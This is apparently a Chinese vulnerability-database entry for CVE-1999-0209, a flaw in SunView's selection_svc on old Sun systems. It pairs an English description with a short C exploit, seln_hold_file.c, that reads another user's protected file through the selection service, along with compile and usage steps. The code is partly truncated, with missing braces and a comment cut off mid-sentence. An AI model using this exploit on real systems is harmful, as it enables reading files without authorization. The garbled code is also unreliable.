SunView (SunTools) selection_svc读取文件漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1105244 漏洞类型 未知
发布时间 1990-08-14 更新时间 2007-07-13
CVE编号 CVE-1999-0209 CNNVD-ID CNNVD-199008-001
漏洞平台 Solaris CVSS评分 5.0

On Sun3 and Sun4 systems, a remote system can read any file that is readable to the user running SunView. On the 386i, a remote system can read any file on the workstation running SunView regardless of protections. Note that if root runs Sunview, all files are potentially accessible by a remote system.

Sunview does not kill the selection_svc process when the user quits from Sunview. Thus, unless the process is killed, remote systems can still read files that were readable to the last user that ran Sunview. Under these circumstances, once a user has run Sunview, start using another window system (such as X11), or even logoff, but still have files accessible to remote systems.

 * For use where someone has a selection_svc runnning as them, after an
 * invocation of suntools:
 * % cat their_private_file
 * their_private_file: Permission denied
 * % cc seln_hold_file.c -o seln_hold_file -lsuntool -lsunwindow
 * % ./seln_hold_file their_private_file
 * % get_selection 2
 * < contents of their_private_file >
 * %

#include <stdio.h>
#include <sys/types.h>
#include <suntool/seln.h>

main(argc, argv)
  int argc;
  char *argv[];
  Seln_result     ret;

  if (argc != 2) {
    (void) fprintf(stderr, "usage: seln_grab file1\n");

  ret = seln_hold_file(SELN_SECONDARY, argv[1]);
  seln_dump_result(stdout, &ret);

 * Local variables:
 * compile-command: "cc -sun3 -Bstatic -o seln_hold_file seln_hold_file.c -lsun
tool -lsunwindow"
 * end:
 * Static required because _mem_ops not included in